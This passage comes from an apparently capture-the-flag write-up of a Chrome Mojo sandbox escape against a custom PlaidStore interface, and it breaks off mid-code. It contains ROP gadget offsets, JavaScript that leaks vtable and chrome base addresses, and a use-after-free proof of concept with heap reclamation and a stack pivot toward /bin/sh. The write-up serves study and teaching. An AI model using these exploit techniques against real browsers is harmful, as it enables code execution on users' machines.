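class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary ./chrome &gt; gadgets.txt</span><br></pre></td></tr></table></figure><blockquote><p>Because the chrome binary is very large, this command needs about <strong>4GB of memory</strong>.</p><p>The resulting <code>gadgets.txt</code> is close to <strong>400MB</strong> in size.</p></blockquote><p>This gives us the relative offsets of the following gadgets:</p><blockquote><p>Combined, these gadgets let us <strong>pivot the stack</strong> and use <code>syscall</code> to execute <code>/bin/sh</code>.</p></blockquote><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span 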
class="line"><span class="number">0x000000000880dee8</span> : <span class="keyword">xchg</span> <span class="built_in">rax</span>, <span class="built_in">rsp</span> <span class="comment">; clc ; pop rbp ; ret</span></span><br><span class="line"><span class="number">0x0000000002e4630f</span> : <span class="keyword">pop</span> <span class="built_in">rdi</span> <span class="comment">; ret</span></span><br><span class="line"><span class="number">0x0000000002d278d2</span> : <span class="keyword">pop</span> <span class="built_in">rsi</span> <span class="comment">; ret</span></span><br><span class="line"><span class="number">0x0000000002e9998e</span> : <span class="keyword">pop</span> <span class="built_in">rdx</span> <span class="comment">; ret</span></span><br><span class="line"><span class="number">0x0000000002e651dd</span> : <span class="keyword">pop</span> <span class="built_in">rax</span> <span class="comment">; ret</span></span><br><span class="line"><span class="number">0x0000000002ef528d</span> : <span class="keyword">syscall</span></span><br></pre></td></tr></table></figure></li><li><p>Finally, we write the following code to leak our target addresses:</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span 
class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 
Make sure to include these js files in the html when calling the MojoJS interface --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">dec2hex</span>(<span class="params">dec</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + dec.<span class="title function_">toString</span>(<span class="number">16</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">bytes2DWORD</span>(<span class="params">bytes</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> value = <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">8</span>; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">            value = value * <span class="number">0x100</span> + bytes[<span 
class="number">7</span> - i];</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> value;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">success</span>(<span class="params">msg</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;[+] &#x27;</span> + msg);</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">document</span>.<span class="property">body</span>.<span class="property">innerText</span> += <span class="string">&#x27;[+] &#x27;</span> + msg + <span class="string">&#x27;\n&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">pwn</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> try_size = <span class="number">100</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> plaidStorePtrList = [];</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; try_size; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> plaidStorePtr = <span 
class="keyword">new</span> blink.<span class="property">mojom</span>.<span class="title class_">PlaidStorePtr</span>();</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">            <span class="title class_">Mojo</span>.<span class="title function_">bindInterface</span>(</span></span><br><span class="line"><span class="language-javascript">                blink.<span class="property">mojom</span>.<span class="property">PlaidStore</span>.<span class="property">name</span>,</span></span><br><span class="line"><span class="language-javascript">                mojo.<span class="title function_">makeRequest</span>(plaidStorePtr).<span class="property">handle</span>,</span></span><br><span class="line"><span class="language-javascript">                <span class="string">&quot;context&quot;</span>,</span></span><br><span class="line"><span class="language-javascript">                <span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">await</span> plaidStorePtr.<span class="title function_">storeData</span>(<span class="string">&quot;aaaa&quot;</span>, <span class="keyword">new</span> <span class="title class_">Uint8Array</span>(<span class="number">0x28</span>).<span class="title function_">fill</span>(<span class="number">0x30</span> + i));</span></span><br><span class="line"><span class="language-javascript">            plaidStorePtrList.<span class="title function_">push</span>(plaidStorePtr);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> <span class="title class_">PlaidStore</span>_vtable_addr = <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> 
render_frame_host_addr = <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; try_size; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// Use await here so that each asynchronous call completes before we continue, since the promise callback runs asynchronously.</span></span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// Get the resolved promise value</span></span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">let</span> res = <span class="keyword">await</span> plaidStorePtrList[i].<span class="title function_">getData</span>(<span class="string">&quot;aaaa&quot;</span>, <span class="number">0x100</span>);</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">let</span> data = res.<span class="property">data</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">for</span> (<span class="keyword">let</span> j = <span class="number">0x28</span>; j &lt; <span class="number">0x100</span> - <span class="number">0x8</span>; j += <span class="number">0x8</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// Although dec2hex() below returns a string, the 0x-prefixed string can still be used directly as a number in later arithmetic.</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> hex = <span class="title function_">bytes2DWORD</span>(data.<span class="title function_">slice</span>(j, j + <span class="number">0x8</span>));</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">if</span> ((hex &amp; <span class="number">0xfff</span>) == <span class="number">0x7a0</span>) &#123;</span></span><br><span class="line"><span 
class="language-javascript">                    <span class="title class_">PlaidStore</span>_vtable_addr = <span class="title function_">dec2hex</span>(hex);</span></span><br><span class="line"><span class="language-javascript">                    render_frame_host_addr = <span class="title function_">dec2hex</span>(<span class="title function_">bytes2DWORD</span>(data.<span class="title function_">slice</span>(j + <span class="number">0x8</span>, j + <span class="number">0x10</span>)));</span></span><br><span class="line"><span class="language-javascript">                    <span class="title function_">success</span>(<span class="string">&quot;PlaidStore vtable: &quot;</span> + <span class="title class_">PlaidStore</span>_vtable_addr);</span></span><br><span class="line"><span class="language-javascript">                    <span class="title function_">success</span>(<span class="string">&quot;render_frame_host: &quot;</span> + render_frame_host_addr);</span></span><br><span class="line"><span class="language-javascript">                    <span class="keyword">break</span>;</span></span><br><span class="line"><span class="language-javascript">                &#125;</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">if</span> (<span class="title class_">PlaidStore</span>_vtable_addr != <span class="number">0</span>)</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">break</span>;</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">if</span> (<span class="title class_">PlaidStore</span>_vtable_addr == <span class="number">0</span>)</span></span><br><span class="line"><span class="language-javascript">            <span 
class="keyword">throw</span> <span class="string">&quot;PlaidStore vtable addr leak failed!&quot;</span>;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> chromeTextBase = <span class="title class_">PlaidStore</span>_vtable_addr - <span class="number">0x9fb67a0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">success</span>(<span class="string">&quot;chrome Text Base: &quot;</span> + <span class="title function_">dec2hex</span>(chromeTextBase));</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> xchg_addr = chromeTextBase + <span class="number">0x000000000880dee8</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">success</span>(<span class="string">&quot;xchg_addr: &quot;</span> + <span class="title function_">dec2hex</span>(xchg_addr));</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> pop_rdi_ret = chromeTextBase + <span class="number">0x0000000002e4630f</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">success</span>(<span class="string">&quot;pop_rdi_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rdi_ret));</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> pop_rsi_ret = chromeTextBase + <span class="number">0x0000000002d278d2</span>;</span></span><br><span class="line"><span class="language-javascript">        <span 
class="title function_">success</span>(<span class="string">&quot;pop_rsi_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rsi_ret));</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> pop_rdx_ret = chromeTextBase + <span class="number">0x0000000002e9998e</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">success</span>(<span class="string">&quot;pop_rdx_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rdx_ret));</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> pop_rax_ret = chromeTextBase + <span class="number">0x0000000002e651dd</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">success</span>(<span class="string">&quot;pop_rax_ret: &quot;</span> + <span class="title function_">dec2hex</span>(pop_rax_ret));</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> syscall_addr = chromeTextBase + <span class="number">0x0000000002ef528d</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">success</span>(<span class="string">&quot;syscall_addr: &quot;</span> + <span class="title function_">dec2hex</span>(syscall_addr));</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="title function_">pwn</span>();</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span 
class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure><p>The leaked addresses are:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[+] <span class="title class_">PlaidStore</span> <span class="attr">vtable</span>: <span class="number">0x557731d667a0</span></span><br><span class="line">[+] <span class="attr">render_frame_host</span>: <span class="number">0x2fde7ced7000</span></span><br><span class="line">[+] chrome <span class="title class_">Text</span> <span class="title class_">Base</span>: <span class="number">0x557727db0000</span></span><br><span class="line">[+] <span class="attr">xchg_addr</span>: <span class="number">0x5577305bdee8</span></span><br><span class="line">[+] <span class="attr">pop_rdi_ret</span>: <span class="number">0x55772abf630f</span></span><br><span class="line">[+] <span class="attr">pop_rsi_ret</span>: <span class="number">0x55772aad78d2</span></span><br><span class="line">[+] <span class="attr">pop_rdx_ret</span>: <span class="number">0x55772ac4998e</span></span><br><span class="line">[+] <span class="attr">pop_rax_ret</span>: <span class="number">0x55772ac151dd</span></span><br><span class="line">[+] <span class="attr">syscall_addr</span>: <span class="number">0x55772aca528d</span></span><br></pre></td></tr></table></figure></li></ul><h3 id="b-UAF">b. 
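UAF</h3><ul><li><p>Because of the UAF on <code>render_frame_host_</code>, the <code>RenderFrameHostImpl</code> memory that the <code>render_frame_host_</code> pointer refers to is <strong>fully controllable</strong> (this memory can first be freed and then allocated again by us).</p><p>We can also use the <code>xchg rax, rsp</code> gadget found earlier to swap the values of <code>$rax</code> and <code>$rsp</code>, which <strong>pivots the stack</strong> so that our <code>gadgets</code> are executed next.</p><p>How do we control the value of <code>$rax</code>? See the figure further down: when the virtual function is called, <code>$rax</code> holds exactly the vtable address stored in the <code>render_frame_host_</code> object (its <code>vtable entry</code>), so we can set <code>$rax</code> by controlling the <code>RenderFrameHostImpl</code> memory. Here we set this <code>vtable entry</code> to <code>render_frame_host_ + 0x10</code>, that is, <code>render_frame_host_[0] = render_frame_host_ + 0x10</code> (this is a bit convoluted, so read it carefully).</p><p>Therefore, we can lay out our <code>gadgets</code> directly in the memory that the <code>render_frame_host_</code> pointer refers to.</p></li><li><p>Before that, however, we need the offset within the vtable of one of the virtual functions called through <code>render_frame_host_</code>. Here we choose the <code>IsRenderFrameLive</code> virtual function.</p><p>We set a breakpoint on <code>PlaidStoreImpl::GetData</code> and single-step a few instructions to reveal the offset. As shown in the figure, the offset of <code>IsRenderFrameLive</code> within the vtable is <code>0x160</code>.</p><p><img src="/2020/10/mojo/renderFrameHostFuncOffset.png" alt="img"></p></li><li><p>After that, we can carefully construct the <code>gadget</code> layout.</p><p><img src="/2020/10/mojo/gadgetMap.jpg" alt="img"></p></li><li><p>One question remains before we lay out the <code>gadget</code>s: after the memory that <code>render_frame_host_</code> points to has been freed, how do we <strong>get this memory allocated back</strong>? A useful detail here is that <strong>chrome manages memory with <code>TCMalloc</code></strong>. Because the <code>vector&lt;uint8_t&gt;</code> allocated by <code>StoreData</code> uses the same allocator as <code>render_frame_host_</code>, <strong>allocating a large number of <code>vector</code>s whose size equals that of <code>RenderFrameHostImpl</code> gives us a chance of reclaiming the freed slot.</strong></p><blockquote><p>TCMalloc (Thread-Caching Malloc) implements efficient multi-threaded memory management and replaces the system memory allocation functions - <a href="https://www.jianshu.com/p/11082b443ddf">TCMalloc解密 (TCMalloc Demystified)</a></p></blockquote><p>So what is <code>sizeof(RenderFrameHostImpl)</code>? Let us find out by debugging.</p><p>First, set a breakpoint on the <code>content::RenderFrameHostImpl::RenderFrameHostImpl</code> constructor and run again:</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 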
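class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; b content::RenderFrameHostImpl::RenderFrameHostImpl</span><br><span class="line">pwndbg&gt; r</span><br></pre></td></tr></table></figure><p>Our goal is to find the function that calls this constructor and check the size passed to <code>operator new</code> before the <code>RenderFrameHostImpl</code> constructor runs.</p><blockquote><p>As shown in the figure, our target is the <code>content::RenderFrameHostFactory::Create</code> function. Set a breakpoint on it and <strong>run again</strong>.</p></blockquote><p><img src="/2020/10/mojo/renderFrameHostSize1.png" alt="img"></p><p>Single-stepping through <code>RenderFrameHostFactory::Create</code>, there is only one call to <code>operator new</code> in the whole function, and the <code>0xc28</code> passed there is exactly the size of <code>RenderFrameHostImpl</code>.</p><p><img src="/2020/10/mojo/renderFrameHostSize.png" alt="img"></p></li><li><p>Suppose we create a <code>child iframe</code> and set up a <code>PlaidStoreImpl</code> instance in it. If we close this <code>child iframe</code>, the corresponding <code>RenderFrameHost</code> is <strong>closed automatically</strong>; at the same time, the mojo pipe between the browser and the <code>PlaidStoreImpl</code> belonging to the <code>child iframe</code> <strong>is disconnected</strong>. <strong>Once that pipe is disconnected, the <code>PlaidStoreImpl</code> instance is destructed</strong>.</p><p>Therefore, before closing the <code>child iframe</code>, we need to hand the <code>remote</code> end of the pipe over to the <code>parent iframe</code>, so that the <code>PlaidStoreImpl</code> instance of the <code>child iframe</code> stays alive after the iframe is closed.</p><blockquote><p>Recall that under normal circumstances, when an iframe is closed, <strong>the RenderFrameHost is destructed</strong> and <strong>the mojo pipe is closed</strong>. <strong>Closing the Mojo pipe always triggers the destruction of PlaidStoreImpl</strong>, so every object that should be destructed is destructed.</p><p>That does not happen here: before the <code>child iframe</code> is closed, the <strong><code>Remote</code> end of the Mojo pipe</strong> held by that <code>iframe</code> has already been handed over, so closing the <code>child iframe</code> <strong>does not close the Mojo pipe</strong>. The lifetime of <code>PlaidStoreImpl</code> is not tied to <code>RenderFrameHost</code>; in other words, destructing the <code>RenderFrameHost</code> <strong>has no effect at all</strong> on the lifetime of the <code>PlaidStoreImpl</code> instance. As a result, the <code>PlaidStoreImpl</code> instance is not destructed.</p></blockquote><p>So the question is, <strong>how do we hand over the <code>remote</code> end of the Mojo pipe?</strong> 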
The answer is to use <code>MojoInterfaceInterceptor</code>. It can intercept <code>Mojo.bindInterface</code> calls coming from other <code>iframe</code>s in the same process. Before the <code>child iframe</code> is destroyed, we can use it to pass one end of the mojo pipe to the <code>parent iframe</code>.</p><p>The following code comes from another exploit; this snippet shows how <code>MojoInterfaceInterceptor</code> is used in practice:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">var kPwnInterfaceName = <span class="string">&quot;pwn&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// runs in the child frame</span></span><br><span class="line"><span class="function">function <span class="title">sendPtr</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  var pipe = Mojo.<span class="built_in">createMessagePipe</span>();</span><br><span class="line">  <span class="comment">// bind the InstalledAppProvider with the child rfh</span></span><br><span class="line">  Mojo.<span 
class="built_in">bindInterface</span>(blink.mojom.InstalledAppProvider.name,</span><br><span class="line">    pipe.handle1, <span class="string">&quot;context&quot;</span>, <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// pass the endpoint handle to the parent frame</span></span><br><span class="line">  Mojo.<span class="built_in">bindInterface</span>(kPwnInterfaceName, pipe.handle0, <span class="string">&quot;process&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// runs in the parent frame</span></span><br><span class="line"><span class="function">function <span class="title">getFreedPtr</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">return</span> <span class="keyword">new</span> <span class="built_in">Promise</span>(<span class="built_in">function</span> (resolve, reject) &#123;</span><br><span class="line">    var frame = <span class="built_in">allocateRFH</span>(window.location.href + <span class="string">&quot;#child&quot;</span>); <span class="comment">// designate the child by hash</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// intercept bindInterface calls for this process to accept the handle from the child</span></span><br><span class="line">    let interceptor = <span class="keyword">new</span> <span class="built_in">MojoInterfaceInterceptor</span>(kPwnInterfaceName, <span class="string">&quot;process&quot;</span>);</span><br><span class="line">    interceptor.oninterfacerequest = <span class="built_in">function</span>(e) &#123;</span><br><span class="line">      interceptor.<span class="built_in">stop</span>();</span><br><span class="line"></span><br><span class="line">      <span class="comment">// bind and return the remote</span></span><br><span class="line">      var provider_ptr = <span 
class="keyword">new</span> blink.mojom.<span class="built_in">InstalledAppProviderPtr</span>(e.handle);</span><br><span class="line">      <span class="built_in">freeRFH</span>(frame);</span><br><span class="line">      <span class="built_in">resolve</span>(provider_ptr);</span><br><span class="line">    &#125;</span><br><span class="line">    interceptor.<span class="built_in">start</span>();</span><br><span class="line">  &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>With all the potential problems solved, the UAF can be exploited as follows:</p><ul><li>Hand the <code>remote</code> end of the Mojo pipe in the <code>child iframe</code> over to the <code>parent iframe</code>, so that the Mojo pipe stays connected.</li><li>Free the <code>child iframe</code>.</li><li>Allocate memory repeatedly until an allocation lands in the region of the freed <code>RenderFrameHostImpl</code>.</li><li>Write the target data.</li><li>Call <code>PlaidStoreImpl::GetData</code> on the instance that belongs to the <code>child iframe</code>.</li></ul></li><li><p>Write a PoC to verify the UAF:</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span 
class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- These JS files must be included in the HTML before calling the MojoJS interfaces --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span 
class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">pwn</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> frame = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;iframe&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            frame.<span class="property">srcdoc</span> = <span class="string">`</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;script src=&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;&gt;&lt;\/script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;script src=&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;&gt;&lt;\/script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    var plaidStorePtr = new blink.mojom.PlaidStorePtr();</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    Mojo.bindInterface(</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        blink.mojom.PlaidStore.name,</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        mojo.makeRequest(plaidStorePtr).handle,</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">        &quot;context&quot;,</span></span></span><br><span class="line"><span 
class="string"><span class="language-javascript">        true);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    plaidStorePtr.storeData(&quot;aaaa&quot;, new Uint8Array(0x28).fill(0x30));</span></span></span><br><span class="line"><span class="string"><span class="language-javascript"></span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    window.plaidStorePtr = plaidStorePtr;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">    console.log(&quot;iframe loaded&quot;);</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">&lt;\/script&gt;</span></span></span><br><span class="line"><span class="string"><span class="language-javascript">`</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">appendChild</span>(frame);</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// run the rest asynchronously, once the frame has finished loading</span></span></span><br><span class="line"><span class="language-javascript">            frame.<span class="property">contentWindow</span>.<span class="title function_">addEventListener</span>(<span class="string">&quot;DOMContentLoaded&quot;</span>, <span class="title function_">async</span> () =&gt; &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> childPlaidStorePtr = frame.<span class="property">contentWindow</span>.<span class="property">plaidStorePtr</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">if</span>(childPlaidStorePtr == <span class="literal">undefined</span> || childPlaidStorePtr == <span 
class="number">0</span>)</span></span><br><span class="line"><span class="language-javascript">                    <span class="keyword">throw</span> <span class="string">&quot;Error in iframe loading&quot;</span>;</span></span><br><span class="line"><span class="language-javascript">                <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;parent iframe start working&quot;</span>)</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// pre-allocate a 0xc28-byte buffer</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> buf = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0xc28</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// view the same buffer as an array of 64-bit integers (same underlying memory)</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">var</span> uaf_buf = <span class="keyword">new</span> <span class="title class_">BigUint64Array</span>(buf);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// set the first 8 bytes (the vtable pointer slot) to 0xdeadbeef, an arbitrary but easily recognizable value,</span></span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// so that $rax is guaranteed to equal 0xdeadbeef at the time of the crash</span></span></span><br><span class="line"><span class="language-javascript">                uaf_buf[<span class="number">0</span>] = <span class="title class_">BigInt</span>(<span 